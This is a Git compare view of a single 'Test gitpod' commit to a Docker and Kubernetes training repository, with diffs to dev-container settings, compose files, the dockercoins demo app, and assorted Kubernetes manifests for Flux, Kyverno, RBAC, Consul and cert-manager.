Compare commits


main...gitpod (1 commit)

Commit 8dacf00bf3 by Jerome Petazzoni: "Test gitpod" (2020-04-03 10:56:39 -05:00)
815 changed files with 12786 additions and 79403 deletions


@@ -1,26 +0,0 @@
{
"name": "container.training environment to get started with Docker and/or Kubernetes",
"image": "ghcr.io/jpetazzo/shpod",
"features": {
//"ghcr.io/devcontainers/features/common-utils:2": {}
},
// Use 'forwardPorts' to make a list of ports inside the container available locally.
"forwardPorts": [],
//"postCreateCommand": "... install extra packages...",
"postStartCommand": "dind.sh ; kind.sh",
// This lets us use "docker-outside-docker".
// Unfortunately, minikube, kind, etc. don't work very well that way;
// so for now, we'll likely use "docker-in-docker" instead (with a
// privileged container). But we're still exposing that socket in case
// someone wants to do something interesting with it.
"mounts": ["source=/var/run/docker.sock,target=/var/run/docker-host.sock,type=bind"],
// This is for docker-in-docker.
"privileged": true,
// Uncomment to connect as root instead. More info: https://aka.ms/dev-containers-non-root.
"remoteUser": "k8s"
}
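
A note on the socket mount above: with the host's Docker socket bind-mounted at /var/run/docker-host.sock, a shell inside the dev container can drive the host daemon directly ("docker-outside-of-docker"). A minimal sketch, assuming the docker CLI is installed in the container:

    # Point the CLI at the host daemon through the bind-mounted socket,
    # then list the containers running on the host.
    export DOCKER_HOST=unix:///var/run/docker-host.sock
    docker ps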

.gitignore (vendored): 17 changed lines

@@ -1,24 +1,14 @@
*.pyc
*.swp
*~
**/terraform.tfstate
**/terraform.tfstate.backup
prepare-labs/terraform/lab-environments
prepare-labs/terraform/many-kubernetes/one-kubernetes-config/config.tf
prepare-labs/terraform/many-kubernetes/one-kubernetes-module/*.tf
prepare-labs/terraform/tags
prepare-labs/terraform/virtual-machines/openstack/*.tfvars
prepare-labs/terraform/virtual-machines/proxmox/*.tfvars
prepare-labs/www
prepare-vms/tags
prepare-vms/infra
prepare-vms/www
slides/*.yml.html
slides/autopilot/state.yaml
slides/index.html
slides/past.html
slides/slides.zip
slides/_academy_*
slides/fragments
node_modules
### macOS ###
@@ -32,4 +22,3 @@ node_modules
Thumbs.db
ehthumbs.db
ehthumbs_vista.db

.gitpod.yml (new file): 1 line added

@@ -0,0 +1 @@
image: jpetazzo/shpod


@@ -1,3 +1,2 @@
hostname frr
ip nht resolve-via-default
log stdout


@@ -2,36 +2,30 @@ version: "3"
services:
bgpd:
image: frrouting/frr:v8.2.2
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
cap_add:
- NET_ADMIN
- SYS_ADMIN
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel --no_zebra
entrypoint: /usr/lib/frr/bgpd -f /etc/frr/bgpd.conf --log=stdout --log-level=debug --no_kernel
restart: always
zebra:
image: frrouting/frr:v8.2.2
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
cap_add:
- NET_ADMIN
- SYS_ADMIN
entrypoint: /usr/lib/frr/zebra -f /etc/frr/zebra.conf --log=stdout --log-level=debug
restart: always
vtysh:
image: frrouting/frr:v8.2.2
image: ajones17/frr:662
volumes:
- ./conf:/etc/frr
- ./run:/var/run/frr
network_mode: host
entrypoint: vtysh
entrypoint: vtysh -c "show ip bgp"
chmod:
image: alpine


@@ -9,21 +9,21 @@ services:
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
image: k8s.gcr.io/etcd:3.4.3
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount --allow-privileged
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-controller-manager --master http://localhost:8080 --allocate-node-cidrs --cluster-cidr=10.CLUSTER.0.0/16
"Edit the CLUSTER placeholder first. Then, remove this line.":
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-scheduler --master http://localhost:8080
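
As the placeholder line in the hunk above says, the CLUSTER token in --cluster-cidr has to be replaced before this Compose file can be brought up. A minimal sketch, assuming the file is saved locally as docker-compose.yaml (hypothetical path) and that this is cluster number 1:

    # Drop the reminder line, substitute the placeholder, then start the control plane.
    sed -i '/Then, remove this line/d' docker-compose.yaml
    sed -i 's/CLUSTER/1/' docker-compose.yaml
    docker-compose up -d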


@@ -1,6 +1,3 @@
# Note: hyperkube isn't available after Kubernetes 1.18.
# So we'll have to update this for Kubernetes 1.19!
version: "3"
services:
@@ -12,20 +9,20 @@ services:
etcd:
network_mode: "service:pause"
image: k8s.gcr.io/etcd:3.4.9
image: k8s.gcr.io/etcd:3.4.3
command: etcd
kube-apiserver:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-apiserver --etcd-servers http://127.0.0.1:2379 --address 0.0.0.0 --disable-admission-plugins=ServiceAccount
kube-controller-manager:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-controller-manager --master http://localhost:8080
kube-scheduler:
network_mode: "service:pause"
image: k8s.gcr.io/hyperkube:v1.18.8
image: k8s.gcr.io/hyperkube:v1.17.2
command: kube-scheduler --master http://localhost:8080


@@ -1,72 +0,0 @@
# (1) Setting up a registry, and telling Tilt to use it.
# Tilt needs a registry to store images.
# The following manifest defines a Deployment to run a basic Docker registry,
# and a NodePort Service to access it. Using a NodePort means that we don't
# need to obtain a TLS certificate, because we will be accessing the registry
# through localhost.
k8s_yaml('../k8s/tilt-registry.yaml')
# Tell Tilt to use the registry that we just deployed instead of whatever
# is defined in our Kubernetes resources. Tilt will patch image names to
# use our registry.
default_registry('localhost:30555')
# Create a port forward so that we can access the registry from our local
# environment, too. Note that if you run Tilt directly from a Kubernetes node
# (which is not typical, but might happen in some lab/training environments)
# the following might cause an error because port 30555 is already taken.
k8s_resource(workload='tilt-registry', port_forwards='30555:5000')
# (2) Telling Tilt how to build and run our app.
# The following two lines will use the kubectl-build plugin
# to leverage buildkit and build the images in our Kubernetes
# cluster. This is not enabled by default, because it requires
# the plugin to be installed.
# See https://github.com/vmware-tanzu/buildkit-cli-for-kubectl
# for more information about this plugin.
#load('ext://kubectl_build', 'kubectl_build')
#docker_build = kubectl_build
# Our Kubernetes manifests use images 'dockercoins/...' so we tell Tilt
# how each of these images should be built. The first argument is the name
# of the image, the second argument is the directory containing the build
# context (i.e. the Dockerfile to build the image).
docker_build('dockercoins/hasher', 'hasher')
docker_build('dockercoins/rng', 'rng')
docker_build('dockercoins/webui', 'webui')
docker_build('dockercoins/worker', 'worker')
# The following manifest defines five Deployments and four Services for
# our application.
k8s_yaml('../k8s/dockercoins.yaml')
# (3) Finishing touches.
# The following line lets Tilt run with the default kubeadm cluster-admin context.
allow_k8s_contexts('kubernetes-admin@kubernetes')
# Note: the whole section below (to set up ngrok tunnels) is disabled,
# because ngrok now requires setting up an account to serve HTML
# content. So we can still use ngrok for e.g. webhooks and "raw" APIs,
# but not to serve web pages like the Tilt UI.
# # This will run an ngrok tunnel to expose Tilt to the outside world.
# # This is intended to be used when Tilt runs on a remote machine.
# local_resource(name='ngrok:tunnel', serve_cmd='ngrok http 10350')
# # This will wait until the ngrok tunnel is up, and show its URL to the user.
# # We send the output to /dev/tty so that it doesn't get intercepted by
# # Tilt, and gets displayed to the user's terminal instead.
# # Note: this assumes that the ngrok instance will be running on port 4040.
# # If you have other ngrok instances running on the machine, this might not work.
# local_resource(name='ngrok:showurl', cmd='''
# while sleep 1; do
# TUNNELS=$(curl -fsSL http://localhost:4040/api/tunnels | jq -r .tunnels[].public_url)
# [ "$TUNNELS" ] && break
# done
# printf "\nYou should be able to connect to the Tilt UI with the following URL(s): %s\n" "$TUNNELS" >/dev/tty
# '''
# )
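
As a usage sketch for the Tiltfile above (assuming Tilt is installed and kubectl points at the lab cluster), it would be run from the directory that contains it; the port 10350 mentioned in the disabled ngrok section is Tilt's default UI port:

    # Start Tilt in interactive mode (web UI on http://localhost:10350),
    # or run a one-shot, CI-style build-and-deploy.
    tilt up
    tilt ci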


@@ -1,24 +1,26 @@
services:
version: "2"
services:
rng:
build: rng
ports:
- "8001:80"
- "8001:80"
hasher:
build: hasher
ports:
- "8002:80"
- "8002:80"
webui:
build: webui
ports:
- "8000:80"
- "8000:80"
volumes:
- "./webui/files/:/files/"
- "./webui/files/:/files/"
redis:
image: redis
worker:
build: worker


@@ -1,8 +1,7 @@
FROM ruby:alpine
WORKDIR /app
RUN apk add --update build-base curl
RUN gem install sinatra --version '~> 3'
RUN gem install sinatra
RUN gem install thin
COPY hasher.rb .
CMD ["ruby", "hasher.rb", "-o", "::"]
ADD hasher.rb /
CMD ["ruby", "hasher.rb"]
EXPOSE 80


@@ -2,6 +2,7 @@ require 'digest'
require 'sinatra'
require 'socket'
set :bind, '0.0.0.0'
set :port, 80
post '/' do


@@ -1,7 +1,5 @@
FROM python:alpine
WORKDIR /app
RUN pip install Flask
COPY rng.py .
ENV FLASK_APP=rng FLASK_RUN_HOST=:: FLASK_RUN_PORT=80
CMD ["flask", "run", "--without-threads"]
COPY rng.py /
CMD ["python", "rng.py"]
EXPOSE 80


@@ -28,5 +28,5 @@ def rng(how_many_bytes):
if __name__ == "__main__":
app.run(port=80)
app.run(host="0.0.0.0", port=80, threaded=False)


@@ -1,8 +1,7 @@
FROM node:23-alpine
WORKDIR /app
FROM node:4-slim
RUN npm install express
RUN npm install morgan
RUN npm install redis@5
COPY . .
RUN npm install redis
COPY files/ /files/
COPY webui.js /
CMD ["node", "webui.js"]
EXPOSE 80


@@ -13,7 +13,7 @@
color: royalblue;
}
</style>
<script src="jquery-1.11.3.min.js"></script>
<script src="jquery.js"></script>
<script src="d3.min.js"></script>
<script src="rickshaw.min.js"></script>
<script>

dockercoins/webui/files/jquery.js (new symbolic link, vendored): 1 line added

@@ -0,0 +1 @@
jquery-1.11.3.min.js


@@ -1,34 +1,26 @@
import express from 'express';
import morgan from 'morgan';
import { createClient } from 'redis';
var client = await createClient({
url: "redis://redis",
socket: {
family: 0
}
})
.on("error", function (err) {
console.error("Redis error", err);
})
.connect();
var express = require('express');
var app = express();
var redis = require('redis');
app.use(morgan('common'));
var client = redis.createClient(6379, 'redis');
client.on("error", function (err) {
console.error("Redis error", err);
});
app.get('/', function (req, res) {
res.redirect('/index.html');
});
app.get('/json', async(req, res) => {
var coins = await client.hLen('wallet');
var hashes = await client.get('hashes');
var now = Date.now() / 1000;
res.json({
coins: coins,
hashes: hashes,
now: now
app.get('/json', function (req, res) {
client.hlen('wallet', function (err, coins) {
client.get('hashes', function (err, hashes) {
var now = Date.now() / 1000;
res.json( {
coins: coins,
hashes: hashes,
now: now
});
});
});
});


@@ -1,6 +1,5 @@
FROM python:alpine
WORKDIR /app
RUN pip install redis
RUN pip install requests
COPY worker.py .
COPY worker.py /
CMD ["python", "worker.py"]


@@ -1,9 +0,0 @@
apiVersion: v1
kind: ConfigMap
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
data:
use-forwarded-headers: true
compute-full-forwarded-for: true
use-proxy-protocol: true


@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: ingress-nginx


@@ -1,12 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- M6-ingress-nginx-components.yaml
- sync.yaml
patches:
- path: M6-ingress-nginx-cm-patch.yaml
target:
kind: ConfigMap
- path: M6-ingress-nginx-svc-patch.yaml
target:
kind: Service


@@ -1,8 +0,0 @@
apiVersion: v1
kind: Service
metadata:
name: ingress-nginx-controller
namespace: ingress-nginx
annotations:
service.beta.kubernetes.io/scw-loadbalancer-proxy-protocol-v2: true
service.beta.kubernetes.io/scw-loadbalancer-use-hostname: true


@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: kyverno


@@ -1,72 +0,0 @@
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
name: flux-multi-tenancy
spec:
validationFailureAction: enforce
rules:
- name: serviceAccountName
exclude:
resources:
namespaces:
- flux-system
match:
resources:
kinds:
- Kustomization
- HelmRelease
validate:
message: ".spec.serviceAccountName is required"
pattern:
spec:
serviceAccountName: "?*"
- name: kustomizationSourceRefNamespace
exclude:
resources:
namespaces:
- flux-system
- ingress-nginx
- kyverno
- monitoring
- openebs
match:
resources:
kinds:
- Kustomization
preconditions:
any:
- key: "{{request.object.spec.sourceRef.namespace}}"
operator: NotEquals
value: ""
validate:
message: "spec.sourceRef.namespace must be the same as metadata.namespace"
deny:
conditions:
- key: "{{request.object.spec.sourceRef.namespace}}"
operator: NotEquals
value: "{{request.object.metadata.namespace}}"
- name: helmReleaseSourceRefNamespace
exclude:
resources:
namespaces:
- flux-system
- ingress-nginx
- kyverno
- monitoring
- openebs
match:
resources:
kinds:
- HelmRelease
preconditions:
any:
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
operator: NotEquals
value: ""
validate:
message: "spec.chart.spec.sourceRef.namespace must be the same as metadata.namespace"
deny:
conditions:
- key: "{{request.object.spec.chart.spec.sourceRef.namespace}}"
operator: NotEquals
value: "{{request.object.metadata.namespace}}"


@@ -1,29 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: monitoring
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: grafana
namespace: monitoring
spec:
ingressClassName: nginx
rules:
- host: grafana.test.metal.mybestdomain.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: kube-prometheus-stack-grafana
port:
number: 80


@@ -1,35 +0,0 @@
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: deny-from-other-namespaces
spec:
podSelector: {}
ingress:
- from:
- podSelector: {}
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-webui
spec:
podSelector:
matchLabels:
app: web
ingress:
- from: []
---
kind: NetworkPolicy
apiVersion: networking.k8s.io/v1
metadata:
name: allow-db
spec:
podSelector:
matchLabels:
app: db
ingress:
- from:
- podSelector:
matchLabels:
app: web


@@ -1,10 +0,0 @@
apiVersion: v1
kind: Namespace
metadata:
labels:
app.kubernetes.io/instance: flux-system
app.kubernetes.io/part-of: flux
app.kubernetes.io/version: v2.5.1
pod-security.kubernetes.io/warn: restricted
pod-security.kubernetes.io/warn-version: latest
name: openebs


@@ -1,12 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
namespace: openebs
resources:
- M6-openebs-components.yaml
- sync.yaml
configMapGenerator:
- name: openebs-values
files:
- values.yaml=M6-openebs-values.yaml
configurations:
- M6-openebs-kustomizeconfig.yaml


@@ -1,6 +0,0 @@
nameReference:
- kind: ConfigMap
version: v1
fieldSpecs:
- path: spec/valuesFrom/name
kind: HelmRelease


@@ -1,15 +0,0 @@
# helm install openebs --namespace openebs openebs/openebs
# --set engines.replicated.mayastor.enabled=false
# --set lvm-localpv.lvmNode.kubeletDir=/var/lib/k0s/kubelet/
# --create-namespace
engines:
replicated:
mayastor:
enabled: false
# Needed for k0s install since kubelet install is slightly divergent from vanilla install >:-(
lvm-localpv:
lvmNode:
kubeletDir: /var/lib/k0s/kubelet/
localprovisioner:
hostpathClass:
isDefaultClass: true


@@ -1,38 +0,0 @@
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
namespace: rocky-test
name: rocky-full-access
rules:
- apiGroups: ["", extensions, apps]
resources: [deployments, replicasets, pods, services, ingresses, statefulsets]
verbs: [get, list, watch, create, update, patch, delete] # You can also use [*]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: rocky-pv-access
rules:
- apiGroups: [""]
resources: [persistentvolumes]
verbs: [get, list, watch, create, patch]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
labels:
toolkit.fluxcd.io/tenant: rocky
name: rocky-reconciler2
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: rocky-pv-access
subjects:
- apiGroup: rbac.authorization.k8s.io
kind: User
name: gotk:rocky-test:reconciler
- kind: ServiceAccount
name: rocky
namespace: rocky-test


@@ -1,19 +0,0 @@
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: rocky
namespace: rocky-test
spec:
ingressClassName: nginx
rules:
- host: rocky.test.mybestdomain.com
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: web
port:
number: 80


@@ -1,8 +0,0 @@
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- ../../base/rocky
patches:
- path: M6-rocky-test-patch.yaml
target:
kind: Kustomization


@@ -1,7 +0,0 @@
apiVersion: kustomize.toolkit.fluxcd.io/v1beta1
kind: Kustomization
metadata:
name: rocky
namespace: rocky-test
spec:
path: ./k8s/plain


@@ -1,8 +0,0 @@
k8s_yaml(helm(
"./path-to-chart", name="blue",
values=[], # Example: ["./path/to/values.yaml"]
set=[
"image.repository=jpetazzo/color",
"image.tag=latest",
]
))


@@ -1,16 +0,0 @@
apiVersion: apiserver.config.k8s.io/v1
kind: AdmissionConfiguration
plugins:
- name: PodSecurity
configuration:
apiVersion: pod-security.admission.config.k8s.io/v1alpha1
kind: PodSecurityConfiguration
defaults:
enforce: baseline
audit: baseline
warn: baseline
exemptions:
usernames:
- cluster-admin
namespaces:
- kube-system


@@ -1,33 +0,0 @@
---
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: blue
name: blue
spec:
replicas: 1
selector:
matchLabels:
app: blue
template:
metadata:
labels:
app: blue
spec:
containers:
- image: jpetazzo/color
name: color
---
apiVersion: v1
kind: Service
metadata:
labels:
app: blue
name: blue
spec:
ports:
- name: "80"
port: 80
selector:
app: blue


@@ -1,36 +0,0 @@
kind: Service
apiVersion: v1
metadata:
name: certbot
spec:
ports:
- port: 80
protocol: TCP
---
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: certbot
spec:
rules:
- http:
paths:
- path: /.well-known/acme-challenge/
pathType: Prefix
backend:
service:
name: certbot
port:
number: 80
---
apiVersion: v1
kind: Endpoints
metadata:
name: certbot
subsets:
- addresses:
- ip: A.B.C.D
ports:
- port: 8000
protocol: TCP


@@ -1,11 +0,0 @@
apiVersion: cert-manager.io/v1
kind: Certificate
metadata:
name: xyz.A.B.C.D.nip.io
spec:
secretName: xyz.A.B.C.D.nip.io
dnsNames:
- xyz.A.B.C.D.nip.io
issuerRef:
name: letsencrypt-staging
kind: ClusterIssuer


@@ -1,18 +0,0 @@
apiVersion: cert-manager.io/v1
kind: ClusterIssuer
metadata:
name: letsencrypt-staging
spec:
acme:
# Remember to update this if you use this manifest to obtain real certificates :)
email: hello@example.com
server: https://acme-staging-v02.api.letsencrypt.org/directory
# To use the production environment, use the following line instead:
#server: https://acme-v02.api.letsencrypt.org/directory
privateKeySecretRef:
name: issuer-letsencrypt-staging
solvers:
- http01:
ingress:
class: traefik
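
The comments in the ClusterIssuer above explain how to switch from the Let's Encrypt staging endpoint to the production one. A quick verification sketch, assuming the manifest is saved as issuer.yaml (hypothetical name):

    # Apply the issuer and wait for its Ready condition to become True,
    # which indicates that the ACME account was registered successfully.
    kubectl apply -f issuer.yaml
    kubectl get clusterissuer
    kubectl describe clusterissuer letsencrypt-staging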


@@ -1,6 +1,3 @@
# Note: apiextensions.k8s.io/v1beta1 is deprecated, and won't be served
# in Kubernetes 1.22 and later versions. This YAML manifest is here just
# for reference, but it's not intended to be used in modern trainings.
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:


@@ -4,13 +4,6 @@ metadata:
name: coffees.container.training
spec:
group: container.training
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
scope: Namespaced
names:
plural: coffees
@@ -18,4 +11,25 @@ spec:
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
properties:
spec:
required:
- taste
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date


@@ -1,37 +0,0 @@
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: coffees.container.training
spec:
group: container.training
scope: Namespaced
names:
plural: coffees
singular: coffee
kind: Coffee
shortNames:
- cof
versions:
- name: v1alpha1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
required: [ spec ]
properties:
spec:
type: object
properties:
taste:
description: Subjective taste of that kind of coffee bean
type: string
required: [ taste ]
additionalPrinterColumns:
- jsonPath: .spec.taste
description: Subjective taste of that kind of coffee bean
name: Taste
type: string
- jsonPath: .metadata.creationTimestamp
name: Age
type: date
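
Once a CRD like the one above is installed, the custom resources behave like built-in objects. A short sketch, using the plural and short names declared in the spec:

    # Check that the CRD is established, then list Coffee objects
    # (the Taste column comes from additionalPrinterColumns).
    kubectl get crd coffees.container.training
    kubectl get coffees
    kubectl get cof        # same thing, using the short name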


@@ -9,9 +9,9 @@ spec:
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: excelsa
name: robusta
spec:
taste: fruity
taste: stronger
---
kind: Coffee
apiVersion: container.training/v1alpha1
@@ -23,12 +23,7 @@ spec:
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: robusta
name: excelsa
spec:
taste: stronger
bitterness: high
---
kind: Coffee
apiVersion: container.training/v1alpha1
metadata:
name: java
taste: fruity


@@ -1,78 +0,0 @@
# Basic Consul cluster using Cloud Auto-Join.
# Caveats:
# - no actual persistence
# - scaling down to 1 will break the cluster
# - pods may be colocated
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"


@@ -1,99 +0,0 @@
# Even better Consul cluster.
# That one uses a volumeClaimTemplate to achieve true persistence.
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
name: consul
rules:
- apiGroups: [""]
resources:
- pods
verbs:
- get
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
name: consul
subjects:
- kind: ServiceAccount
name: consul
---
apiVersion: v1
kind: Service
metadata:
name: consul
spec:
ports:
- port: 8500
name: http
selector:
app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: consul
spec:
serviceName: consul
replicas: 3
selector:
matchLabels:
app: consul
volumeClaimTemplates:
- metadata:
name: data
spec:
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 1Gi
template:
metadata:
labels:
app: consul
spec:
serviceAccountName: consul
affinity:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
volumeMounts:
- name: data
mountPath: /consul/data
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
- "-ui"
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]
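
To check that a Consul StatefulSet like the one above formed a healthy cluster, a few standard commands are enough; a quick sketch:

    # Wait for the rollout, confirm the three servers joined,
    # and verify that one "data-consul-N" claim was created per replica.
    kubectl rollout status statefulset consul
    kubectl exec consul-0 -- consul members
    kubectl get pvc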


@@ -1,15 +1,5 @@
# Better Consul cluster.
# There is still no actual persistence, but:
# - podAntiAffinity prevents pod colocation
# - the cluster works when scaling down to 1 (thanks to the lifecycle hook)
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
kind: ClusterRole
metadata:
name: consul
rules:
@@ -21,16 +11,22 @@ rules:
- list
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
kind: ClusterRoleBinding
metadata:
name: consul
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: Role
kind: ClusterRole
name: consul
subjects:
- kind: ServiceAccount
name: consul
namespace: default
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: consul
---
apiVersion: v1
kind: Service
@@ -63,22 +59,20 @@ spec:
podAntiAffinity:
requiredDuringSchedulingIgnoredDuringExecution:
- labelSelector:
matchLabels:
app: consul
matchExpressions:
- key: app
operator: In
values:
- consul
topologyKey: kubernetes.io/hostname
terminationGracePeriodSeconds: 10
containers:
- name: consul
image: "consul:1.11"
env:
- name: NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
image: "consul:1.6"
args:
- "agent"
- "-bootstrap-expect=3"
- "-retry-join=provider=k8s label_selector=\"app=consul\" namespace=\"$(NAMESPACE)\""
- "-retry-join=provider=k8s label_selector=\"app=consul\""
- "-client=0.0.0.0"
- "-data-dir=/consul/data"
- "-server"
@@ -86,4 +80,7 @@ spec:
lifecycle:
preStop:
exec:
command: [ "sh", "-c", "consul leave" ]
command:
- /bin/sh
- -c
- consul leave


@@ -1,340 +0,0 @@
# This file was generated with the script ./update-dashboard-yaml.sh.
#
---
apiVersion: v1
kind: Namespace
metadata:
creationTimestamp: null
name: kubernetes-dashboard
spec: {}
status: {}
---
apiVersion: v1
kind: ServiceAccount
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard
namespace: kubernetes-dashboard
---
apiVersion: v1
kind: Secret
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-certs
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-csrf
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
kind: Secret
metadata:
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-key-holder
namespace: kubernetes-dashboard
type: Opaque
---
apiVersion: v1
data: null
kind: ConfigMap
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-settings
namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
app.kubernetes.io/name: kubernetes-dashboard
app.kubernetes.io/version: 2.7.0
helm.sh/chart: kubernetes-dashboard-6.0.0
name: kubernetes-dashboard-metrics
rules:
- apiGroups:
- metrics.k8s.io
resources:
- pods
- nodes
verbs:
- get
- list
- watch
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
annotations: null
labels:
app.kubernetes.io/instance: kubernetes-dashboard
app.kubernetes.io/managed-by: Helm
